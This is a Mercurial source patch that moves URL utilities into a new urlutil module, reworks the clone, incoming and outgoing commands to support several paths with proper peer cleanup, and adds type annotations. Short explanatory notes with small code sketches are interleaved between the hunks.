- pathurl = util.url(path, parsequery=False, parsefragment=False)
+ pathurl = urlutil.url(path, parsequery=False, parsefragment=False)
if pathurl.islocal():
return util.posixfile(pathurl.localpath(), b'rb')
else:
@@ -265,7 +263,7 @@
>>> defaultdest(b'http://example.org/foo/')
'foo'
"""
- path = util.url(source).path
+ path = urlutil.url(source).path
if not path:
return b''
return os.path.basename(os.path.normpath(path))
@@ -284,7 +282,7 @@
# the sharedpath always ends in the .hg; we want the path to the repo
source = repo.vfs.split(repo.sharedpath)[0]
- srcurl, branches = parseurl(source)
+ srcurl, branches = urlutil.parseurl(source)
srcrepo = repository(repo.ui, srcurl)
repo.srcrepo = srcrepo
return srcrepo
@@ -307,11 +305,10 @@
if not dest:
dest = defaultdest(source)
else:
- dest = ui.expandpath(dest)
+ dest = urlutil.get_clone_path(ui, dest)[1]
if isinstance(source, bytes):
- origsource = ui.expandpath(source)
- source, branches = parseurl(origsource)
+ origsource, source, branches = urlutil.get_clone_path(ui, source)
srcrepo = repository(ui, source)
rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
else:
@@ -571,7 +568,7 @@
# Resolve the value to put in [paths] section for the source.
if islocal(source):
- defaultpath = os.path.abspath(util.urllocalpath(source))
+ defaultpath = os.path.abspath(urlutil.urllocalpath(source))
else:
defaultpath = source
@@ -674,150 +671,158 @@
"""
if isinstance(source, bytes):
- origsource = ui.expandpath(source)
- source, branches = parseurl(origsource, branch)
+ src = urlutil.get_clone_path(ui, source, branch)
+ origsource, source, branches = src
srcpeer = peer(ui, peeropts, source)
else:
srcpeer = source.peer() # in case we were called with a localrepo
branches = (None, branch or [])
origsource = source = srcpeer.url()
- revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
+ srclock = destlock = cleandir = None
+ destpeer = None
+ try:
+ revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
- if dest is None:
- dest = defaultdest(source)
- if dest:
- ui.status(_(b"destination directory: %s\n") % dest)
- else:
- dest = ui.expandpath(dest)
+ if dest is None:
+ dest = defaultdest(source)
+ if dest:
+ ui.status(_(b"destination directory: %s\n") % dest)
+ else:
+ dest = urlutil.get_clone_path(ui, dest)[0]
- dest = util.urllocalpath(dest)
- source = util.urllocalpath(source)
+ dest = urlutil.urllocalpath(dest)
+ source = urlutil.urllocalpath(source)
- if not dest:
- raise error.InputError(_(b"empty destination path is not valid"))
+ if not dest:
+ raise error.InputError(_(b"empty destination path is not valid"))
- destvfs = vfsmod.vfs(dest, expandpath=True)
- if destvfs.lexists():
- if not destvfs.isdir():
- raise error.InputError(_(b"destination '%s' already exists") % dest)
- elif destvfs.listdir():
- raise error.InputError(_(b"destination '%s' is not empty") % dest)
+ destvfs = vfsmod.vfs(dest, expandpath=True)
+ if destvfs.lexists():
+ if not destvfs.isdir():
+ raise error.InputError(
+ _(b"destination '%s' already exists") % dest
+ )
+ elif destvfs.listdir():
+ raise error.InputError(
+ _(b"destination '%s' is not empty") % dest
+ )
- createopts = {}
- narrow = False
-
- if storeincludepats is not None:
- narrowspec.validatepatterns(storeincludepats)
- narrow = True
+ createopts = {}
+ narrow = False
- if storeexcludepats is not None:
- narrowspec.validatepatterns(storeexcludepats)
- narrow = True
+ if storeincludepats is not None:
+ narrowspec.validatepatterns(storeincludepats)
+ narrow = True
+
+ if storeexcludepats is not None:
+ narrowspec.validatepatterns(storeexcludepats)
+ narrow = True
- if narrow:
- # Include everything by default if only exclusion patterns defined.
- if storeexcludepats and not storeincludepats:
- storeincludepats = {b'path:.'}
+ if narrow:
+ # Include everything by default if only exclusion patterns defined.
+ if storeexcludepats and not storeincludepats:
+ storeincludepats = {b'path:.'}
- createopts[b'narrowfiles'] = True
+ createopts[b'narrowfiles'] = True
- if depth:
- createopts[b'shallowfilestore'] = True
+ if depth:
+ createopts[b'shallowfilestore'] = True
- if srcpeer.capable(b'lfs-serve'):
- # Repository creation honors the config if it disabled the extension, so
- # we can't just announce that lfs will be enabled. This check avoids
- # saying that lfs will be enabled, and then saying it's an unknown
- # feature. The lfs creation option is set in either case so that a
- # requirement is added. If the extension is explicitly disabled but the
- # requirement is set, the clone aborts early, before transferring any
- # data.
- createopts[b'lfs'] = True
+ if srcpeer.capable(b'lfs-serve'):
+ # Repository creation honors the config if it disabled the extension, so
+ # we can't just announce that lfs will be enabled. This check avoids
+ # saying that lfs will be enabled, and then saying it's an unknown
+ # feature. The lfs creation option is set in either case so that a
+ # requirement is added. If the extension is explicitly disabled but the
+ # requirement is set, the clone aborts early, before transferring any
+ # data.
+ createopts[b'lfs'] = True
- if extensions.disabled_help(b'lfs'):
- ui.status(
- _(
- b'(remote is using large file support (lfs), but it is '
- b'explicitly disabled in the local configuration)\n'
+ if extensions.disabled_help(b'lfs'):
+ ui.status(
+ _(
+ b'(remote is using large file support (lfs), but it is '
+ b'explicitly disabled in the local configuration)\n'
+ )
)
- )
- else:
- ui.status(
- _(
- b'(remote is using large file support (lfs); lfs will '
- b'be enabled for this repository)\n'
+ else:
+ ui.status(
+ _(
+ b'(remote is using large file support (lfs); lfs will '
+ b'be enabled for this repository)\n'
+ )
)
- )
- shareopts = shareopts or {}
- sharepool = shareopts.get(b'pool')
- sharenamemode = shareopts.get(b'mode')
- if sharepool and islocal(dest):
- sharepath = None
- if sharenamemode == b'identity':
- # Resolve the name from the initial changeset in the remote
- # repository. This returns nullid when the remote is empty. It
- # raises RepoLookupError if revision 0 is filtered or otherwise
- # not available. If we fail to resolve, sharing is not enabled.
- try:
- with srcpeer.commandexecutor() as e:
- rootnode = e.callcommand(
- b'lookup',
- {
- b'key': b'0',
- },
- ).result()
+ shareopts = shareopts or {}
+ sharepool = shareopts.get(b'pool')
+ sharenamemode = shareopts.get(b'mode')
+ if sharepool and islocal(dest):
+ sharepath = None
+ if sharenamemode == b'identity':
+ # Resolve the name from the initial changeset in the remote
+ # repository. This returns nullid when the remote is empty. It
+ # raises RepoLookupError if revision 0 is filtered or otherwise
+ # not available. If we fail to resolve, sharing is not enabled.
+ try:
+ with srcpeer.commandexecutor() as e:
+ rootnode = e.callcommand(
+ b'lookup',
+ {
+ b'key': b'0',
+ },
+ ).result()
- if rootnode != nullid:
- sharepath = os.path.join(sharepool, hex(rootnode))
- else:
+ if rootnode != nullid:
+ sharepath = os.path.join(sharepool, hex(rootnode))
+ else:
+ ui.status(
+ _(
+ b'(not using pooled storage: '
+ b'remote appears to be empty)\n'
+ )
+ )
+ except error.RepoLookupError:
ui.status(
_(
b'(not using pooled storage: '
- b'remote appears to be empty)\n'
+ b'unable to resolve identity of remote)\n'
)
)
- except error.RepoLookupError:
- ui.status(
- _(
- b'(not using pooled storage: '
- b'unable to resolve identity of remote)\n'
- )
+ elif sharenamemode == b'remote':
+ sharepath = os.path.join(
+ sharepool, hex(hashutil.sha1(source).digest())
+ )
+ else:
+ raise error.Abort(
+ _(b'unknown share naming mode: %s') % sharenamemode
)
- elif sharenamemode == b'remote':
- sharepath = os.path.join(
- sharepool, hex(hashutil.sha1(source).digest())
- )
- else:
- raise error.Abort(
- _(b'unknown share naming mode: %s') % sharenamemode
- )
+
+ # TODO this is a somewhat arbitrary restriction.
+ if narrow:
+ ui.status(
+ _(b'(pooled storage not supported for narrow clones)\n')
+ )
+ sharepath = None
- # TODO this is a somewhat arbitrary restriction.
- if narrow:
- ui.status(_(b'(pooled storage not supported for narrow clones)\n'))
- sharepath = None
+ if sharepath:
+ return clonewithshare(
+ ui,
+ peeropts,
+ sharepath,
+ source,
+ srcpeer,
+ dest,
+ pull=pull,
+ rev=revs,
+ update=update,
+ stream=stream,
+ )
- if sharepath:
- return clonewithshare(
- ui,
- peeropts,
- sharepath,
- source,
- srcpeer,
- dest,
- pull=pull,
- rev=revs,
- update=update,
- stream=stream,
- )
+ srcrepo = srcpeer.local()
- srclock = destlock = cleandir = None
- srcrepo = srcpeer.local()
- try:
abspath = origsource
if islocal(origsource):
- abspath = os.path.abspath(util.urllocalpath(origsource))
+ abspath = os.path.abspath(urlutil.urllocalpath(origsource))
if islocal(dest):
cleandir = dest
@@ -931,7 +936,7 @@
local.setnarrowpats(storeincludepats, storeexcludepats)
narrowspec.copytoworkingcopy(local)
- u = util.url(abspath)
+ u = urlutil.url(abspath)
defaulturl = bytes(u)
local.ui.setconfig(b'paths', b'default', defaulturl, b'clone')
if not stream:
@@ -978,7 +983,7 @@
destrepo = destpeer.local()
if destrepo:
template = uimod.samplehgrcs[b'cloned']
- u = util.url(abspath)
+ u = urlutil.url(abspath)
u.passwd = None
defaulturl = bytes(u)
destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl))
@@ -1055,6 +1060,8 @@
shutil.rmtree(cleandir, True)
if srcpeer is not None:
srcpeer.close()
+ if destpeer and destpeer.local() is None:
+ destpeer.close()
return srcpeer, destpeer
@@ -1114,6 +1121,7 @@
assert stats.unresolvedcount == 0
if show_stats:
_showstats(repo, stats, quietempty)
+ return False
# naming conflict in updatetotally()
@@ -1246,7 +1254,14 @@
def _incoming(
- displaychlist, subreporecurse, ui, repo, source, opts, buffered=False
+ displaychlist,
+ subreporecurse,
+ ui,
+ repo,
+ source,
+ opts,
+ buffered=False,
+ subpath=None,
):
"""
Helper for incoming / gincoming.
@@ -1254,17 +1269,33 @@
(remoterepo, incomingchangesetlist, displayer) parameters,
and is supposed to contain only code that can't be unified.
"""
- source, branches = parseurl(ui.expandpath(source), opts.get(b'branch'))
+ srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
+ srcs = list(srcs)
+ if len(srcs) != 1:
+        msg = _(b'for now, incoming supports only a single source, %d provided')
+ msg %= len(srcs)
+ raise error.Abort(msg)
+ source, branches = srcs[0]
+ if subpath is not None:
+ subpath = urlutil.url(subpath)
+ if subpath.isabs():
+ source = bytes(subpath)
+ else:
+ p = urlutil.url(source)
+ p.path = os.path.normpath(b'%s/%s' % (p.path, subpath))
+ source = bytes(p)
other = peer(repo, opts, source)
- ui.status(_(b'comparing with %s\n') % util.hidepassword(source))
- revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))
+ cleanupfn = other.close
+ try:
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source))
+ revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))
- if revs:
- revs = [other.lookup(rev) for rev in revs]
- other, chlist, cleanupfn = bundlerepo.getremotechanges(
- ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
- )
- try:
+ if revs:
+ revs = [other.lookup(rev) for rev in revs]
+ other, chlist, cleanupfn = bundlerepo.getremotechanges(
+ ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
+ )
+
if not chlist:
ui.status(_(b"no changes found\n"))
return subreporecurse()
@@ -1280,7 +1311,7 @@
return 0 # exit code is zero since we found incoming changes
-def incoming(ui, repo, source, opts):
+def incoming(ui, repo, source, opts, subpath=None):
def subreporecurse():
ret = 1
if opts.get(b'subrepos'):
@@ -1304,67 +1335,115 @@
count += 1
displayer.show(other[n])
- return _incoming(display, subreporecurse, ui, repo, source, opts)
+ return _incoming(
+ display, subreporecurse, ui, repo, source, opts, subpath=subpath
+ )
-def _outgoing(ui, repo, dest, opts):
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.Abort(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
- dest = path.pushloc or path.loc
- branches = path.branch, opts.get(b'branch') or []
+def _outgoing(ui, repo, dests, opts, subpath=None):
+ out = set()
+ others = []
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ dest = path.pushloc or path.loc
+ if subpath is not None:
+ subpath = urlutil.url(subpath)
+ if subpath.isabs():
+ dest = bytes(subpath)
+ else:
+ p = urlutil.url(dest)
+ p.path = os.path.normpath(b'%s/%s' % (p.path, subpath))
+ dest = bytes(p)
+ branches = path.branch, opts.get(b'branch') or []
+
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
+ revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
+ if revs:
+ revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
- ui.status(_(b'comparing with %s\n') % util.hidepassword(dest))
- revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
- if revs:
- revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
+ other = peer(repo, opts, dest)
+ try:
+ outgoing = discovery.findcommonoutgoing(
+ repo, other, revs, force=opts.get(b'force')
+ )
+ o = outgoing.missing
+ out.update(o)
+ if not o:
+ scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
+ others.append(other)
+ except: # re-raises
+ other.close()
+ raise
+ # make sure this is ordered by revision number
+ outgoing_revs = list(out)
+ cl = repo.changelog
+ outgoing_revs.sort(key=cl.rev)
+ return outgoing_revs, others
- other = peer(repo, opts, dest)
- outgoing = discovery.findcommonoutgoing(
- repo, other, revs, force=opts.get(b'force')
- )
- o = outgoing.missing
- if not o:
- scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
- return o, other
+
+def _outgoing_recurse(ui, repo, dests, opts):
+ ret = 1
+ if opts.get(b'subrepos'):
+ ctx = repo[None]
+ for subpath in sorted(ctx.substate):
+ sub = ctx.sub(subpath)
+ ret = min(ret, sub.outgoing(ui, dests, opts))
+ return ret
-def outgoing(ui, repo, dest, opts):
- def recurse():
- ret = 1
- if opts.get(b'subrepos'):
- ctx = repo[None]
- for subpath in sorted(ctx.substate):
- sub = ctx.sub(subpath)
- ret = min(ret, sub.outgoing(ui, dest, opts))
- return ret
-
+def _outgoing_filter(repo, revs, opts):
+ """apply revision filtering/ordering option for outgoing"""
limit = logcmdutil.getlimit(opts)
- o, other = _outgoing(ui, repo, dest, opts)
- if not o:
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- return recurse()
-
+ no_merges = opts.get(b'no_merges')
if opts.get(b'newest_first'):
- o.reverse()
- ui.pager(b'outgoing')
- displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
+ revs.reverse()
+ if limit is None and not no_merges:
+ for r in revs:
+ yield r
+ return
+
count = 0
- for n in o:
+ cl = repo.changelog
+ for n in revs:
if limit is not None and count >= limit:
break
- parents = [p for p in repo.changelog.parents(n) if p != nullid]
- if opts.get(b'no_merges') and len(parents) == 2:
+ parents = [p for p in cl.parents(n) if p != nullid]
+ if no_merges and len(parents) == 2:
continue
count += 1
- displayer.show(repo[n])
- displayer.close()
- cmdutil.outgoinghooks(ui, repo, other, opts, o)
- recurse()
- return 0 # exit code is zero since we found outgoing changes
+ yield n
+
+
+def outgoing(ui, repo, dests, opts, subpath=None):
+ if opts.get(b'graph'):
+ logcmdutil.checkunsupportedgraphflags([], opts)
+ o, others = _outgoing(ui, repo, dests, opts, subpath=subpath)
+ ret = 1
+ try:
+ if o:
+ ret = 0
+
+ if opts.get(b'graph'):
+ revdag = logcmdutil.graphrevs(repo, o, opts)
+ ui.pager(b'outgoing')
+ displayer = logcmdutil.changesetdisplayer(
+ ui, repo, opts, buffered=True
+ )
+ logcmdutil.displaygraph(
+ ui, repo, revdag, displayer, graphmod.asciiedges
+ )
+ else:
+ ui.pager(b'outgoing')
+ displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
+ for n in _outgoing_filter(repo, o, opts):
+ displayer.show(repo[n])
+ displayer.close()
+ for oth in others:
+ cmdutil.outgoinghooks(ui, repo, oth, opts, o)
+ ret = min(ret, _outgoing_recurse(ui, repo, dests, opts))
+ return ret # exit code is zero since we found outgoing changes
+ finally:
+ for oth in others:
+ oth.close()
def verify(repo, level=None):
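
A note on the share-pool naming modes above: in 'remote' mode the pool subdirectory is the hex SHA-1 of the source URL, while 'identity' mode uses the hex node of revision 0 looked up from the peer. A minimal standalone sketch, with made-up paths and hashlib standing in for Mercurial's hashutil wrapper:

    import hashlib
    import os

    source = b'https://example.com/repo'  # hypothetical source URL
    sharepool = b'/pools/hg'              # hypothetical share pool root

    # 'remote' naming mode: derive the pool entry from the URL itself
    sharepath = os.path.join(
        sharepool, hashlib.sha1(source).hexdigest().encode()
    )
    # 'identity' mode would instead use hex(rootnode) from the lookup above
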
--- a/mercurial/hgweb/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/__init__.py - web interface to a mercurial repository
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005 Matt Mackall <mpm@selenic.com>
+# Copyright 2005 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/common.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/common.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/common.py - Utility functions needed by hgweb_mod and hgwebdir_mod
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/hgweb_mod.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/hgweb_mod.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/hgweb_mod.py - Web interface for a repository.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/hgwebdir_mod.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/hgwebdir_mod.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/hgwebdir_mod.py - Web interface for a directory of repositories.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/request.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/request.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/request.py - An http request from either CGI or the standalone server.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -17,6 +17,9 @@
pycompat,
util,
)
+from ..utils import (
+ urlutil,
+)
class multidict(object):
@@ -184,7 +187,7 @@
reponame = env.get(b'REPO_NAME')
if altbaseurl:
- altbaseurl = util.url(altbaseurl)
+ altbaseurl = urlutil.url(altbaseurl)
# https://www.python.org/dev/peps/pep-0333/#environ-variables defines
# the environment variables.
--- a/mercurial/hgweb/server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/server.py - The standalone hg web server.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -28,6 +28,9 @@
pycompat,
util,
)
+from ..utils import (
+ urlutil,
+)
httpservermod = util.httpserver
socketserver = util.socketserver
@@ -431,7 +434,7 @@
sys.setdefaultencoding(oldenc)
address = ui.config(b'web', b'address')
- port = util.getport(ui.config(b'web', b'port'))
+ port = urlutil.getport(ui.config(b'web', b'port'))
try:
return cls(ui, app, (address, port), handler)
except socket.error as inst:
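
The recurring change across these hgweb files is mechanical: URL helpers such as url(), hidepassword() and getport() moved from mercurial.util to the new mercurial.utils.urlutil module. A rough usage sketch, assuming the helpers keep the signatures seen in this diff:

    from mercurial.utils import urlutil

    u = urlutil.url(b'https://user:secret@example.com/repo')
    safe = urlutil.hidepassword(bytes(u))  # password masked in the output
    port = urlutil.getport(b'8080')        # returns an int port number
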
--- a/mercurial/hgweb/webcommands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/webcommands.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hgweb/webutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hgweb/webutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# hgweb/webutil.py - utility library for the web interface.
#
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/hook.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/hook.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# hook.py - hook support for mercurial
#
-# Copyright 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/httpconnection.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/httpconnection.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# httpconnection.py - urllib2 handler for new http support
#
-# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
# Copyright 2011 Google, Inc.
@@ -18,6 +18,10 @@
pycompat,
util,
)
+from .utils import (
+ urlutil,
+)
+
urlerr = util.urlerr
urlreq = util.urlreq
@@ -99,7 +103,7 @@
if not prefix:
continue
- prefixurl = util.url(prefix)
+ prefixurl = urlutil.url(prefix)
if prefixurl.user and prefixurl.user != user:
# If a username was set in the prefix, it must match the username in
# the URI.
--- a/mercurial/httppeer.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/httppeer.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# httppeer.py - HTTP repository proxy classes for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -38,6 +38,7 @@
from .utils import (
cborutil,
stringutil,
+ urlutil,
)
httplib = util.httplib
@@ -171,9 +172,9 @@
# Send arguments via HTTP headers.
if headersize > 0:
# The headers can typically carry more data than the URL.
- encargs = urlreq.urlencode(sorted(args.items()))
+ encoded_args = urlreq.urlencode(sorted(args.items()))
for header, value in encodevalueinheaders(
- encargs, b'X-HgArg', headersize
+ encoded_args, b'X-HgArg', headersize
):
headers[header] = value
# Send arguments via query string (Mercurial <1.9).
@@ -305,7 +306,7 @@
except httplib.HTTPException as inst:
ui.debug(
b'http error requesting %s\n'
- % util.hidepassword(req.get_full_url())
+ % urlutil.hidepassword(req.get_full_url())
)
ui.traceback()
raise IOError(None, inst)
@@ -352,14 +353,14 @@
except AttributeError:
proto = pycompat.bytesurl(resp.headers.get('content-type', ''))
- safeurl = util.hidepassword(baseurl)
+ safeurl = urlutil.hidepassword(baseurl)
if proto.startswith(b'application/hg-error'):
raise error.OutOfBandError(resp.read())
# Pre 1.0 versions of Mercurial used text/plain and
# application/hg-changegroup. We don't support such old servers.
if not proto.startswith(b'application/mercurial-'):
- ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl))
+ ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl))
msg = _(
b"'%s' does not appear to be an hg repository:\n"
b"---%%<--- (%s)\n%s\n---%%<---\n"
@@ -1058,7 +1059,7 @@
``requestbuilder`` is the type used for constructing HTTP requests.
It exists as an argument so extensions can override the default.
"""
- u = util.url(path)
+ u = urlutil.url(path)
if u.query or u.fragment:
raise error.Abort(
_(b'unsupported URL component: "%s"') % (u.query or u.fragment)
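
For context on the header-based argument encoding touched above: when command arguments do not fit in the URL, the urlencoded string is spread across numbered X-HgArg-<n> headers, each kept under a size limit. A simplified illustration of the idea, not Mercurial's actual encodevalueinheaders, whose chunking also accounts for the header name length:

    def encode_in_headers(value, header, limit):
        """Yield (header name, chunk) pairs covering ``value``."""
        n = 0
        while value:
            n += 1
            chunk, value = value[:limit], value[limit:]
            yield (b'%s-%d' % (header, n), chunk)

    # list(encode_in_headers(b'cmd=heads&key=abc', b'X-HgArg', 8))
    # -> [(b'X-HgArg-1', b'cmd=head'), (b'X-HgArg-2', b's&key=ab'), ...]
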
--- a/mercurial/i18n.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/i18n.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# i18n.py - internationalization support for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -19,6 +19,13 @@
pycompat,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Callable,
+ List,
+ )
+
+
# modelled after templater.templatepath:
if getattr(sys, 'frozen', None) is not None:
module = pycompat.sysexecutable
@@ -40,7 +47,10 @@
try:
import ctypes
+ # pytype: disable=module-attr
langid = ctypes.windll.kernel32.GetUserDefaultUILanguage()
+ # pytype: enable=module-attr
+
_languages = [locale.windows_locale[langid]]
except (ImportError, AttributeError, KeyError):
# ctypes not found or unknown langid
@@ -51,7 +61,7 @@
localedir = os.path.join(datapath, 'locale')
t = gettextmod.translation('hg', localedir, _languages, fallback=True)
try:
- _ugettext = t.ugettext
+ _ugettext = t.ugettext # pytype: disable=attribute-error
except AttributeError:
_ugettext = t.gettext
@@ -60,6 +70,7 @@
def gettext(message):
+ # type: (bytes) -> bytes
"""Translate message.
The message is looked up in the catalog to get a Unicode string,
@@ -77,7 +88,7 @@
if message not in cache:
if type(message) is pycompat.unicode:
# goofy unicode docstrings in test
- paragraphs = message.split(u'\n\n')
+ paragraphs = message.split(u'\n\n') # type: List[pycompat.unicode]
else:
# should be ascii, but we have unicode docstrings in test, which
# are converted to utf-8 bytes on Python 3.
@@ -110,6 +121,6 @@
if _plain():
- _ = lambda message: message
+ _ = lambda message: message # type: Callable[[bytes], bytes]
else:
_ = gettext
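
The i18n annotations above use the comment style because the module must stay importable on Python 2, and the typing imports are guarded so they only execute under a type checker such as pytype. A minimal sketch of the same pattern outside Mercurial:

    TYPE_CHECKING = False  # stand-in for pycompat.TYPE_CHECKING
    if TYPE_CHECKING:
        from typing import Callable

    def shout(message):
        # type: (bytes) -> bytes
        return message.upper()

    echo = lambda message: message  # type: Callable[[bytes], bytes]
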
--- a/mercurial/interfaces/dirstate.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/interfaces/dirstate.py Tue Apr 20 11:01:06 2021 -0400
@@ -8,7 +8,7 @@
class idirstate(interfaceutil.Interface):
- def __init__(opener, ui, root, validate, sparsematchfn):
+ def __init__(opener, ui, root, validate, sparsematchfn, nodeconstants):
"""Create a new dirstate object.
opener is an open()-like callable that can be used to open the
--- a/mercurial/interfaces/repository.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/interfaces/repository.py Tue Apr 20 11:01:06 2021 -0400
@@ -453,6 +453,10 @@
"""
)
+ sidedata = interfaceutil.Attribute(
+ """Raw sidedata bytes for the given revision."""
+ )
+
class ifilerevisionssequence(interfaceutil.Interface):
"""Contains index data for all revisions of a file.
@@ -519,6 +523,10 @@
* Metadata to facilitate storage.
"""
+ nullid = interfaceutil.Attribute(
+ """node for the null revision for use as delta base."""
+ )
+
def __len__():
"""Obtain the number of revisions stored for this file."""
@@ -734,7 +742,7 @@
flags=0,
cachedelta=None,
):
- """Add a new revision to the store.
+ """Add a new revision to the store and return its number.
This is similar to ``add()`` except it operates at a lower level.
@@ -769,7 +777,14 @@
``nullid``, in which case the header from the delta can be ignored
and the delta used as the fulltext.
- ``addrevisioncb`` should be called for each node as it is committed.
+ ``alwayscache`` instructs the lower layers to cache the content of the
+ newly added revision, even if it needs to be explicitly computed.
+ This used to be the default when ``addrevisioncb`` was provided up to
+ Mercurial 5.8.
+
+ ``addrevisioncb`` should be called for each new rev as it is committed.
+ ``duplicaterevisioncb`` should be called for all revs with a
+ pre-existing node.
``maybemissingparents`` is a bool indicating whether the incoming
data may reference parents/ancestor revisions that aren't present.
@@ -1132,6 +1147,10 @@
class imanifeststorage(interfaceutil.Interface):
"""Storage interface for manifest data."""
+ nodeconstants = interfaceutil.Attribute(
+ """nodeconstants used by the current repository."""
+ )
+
tree = interfaceutil.Attribute(
"""The path to the directory this manifest tracks.
@@ -1355,6 +1374,10 @@
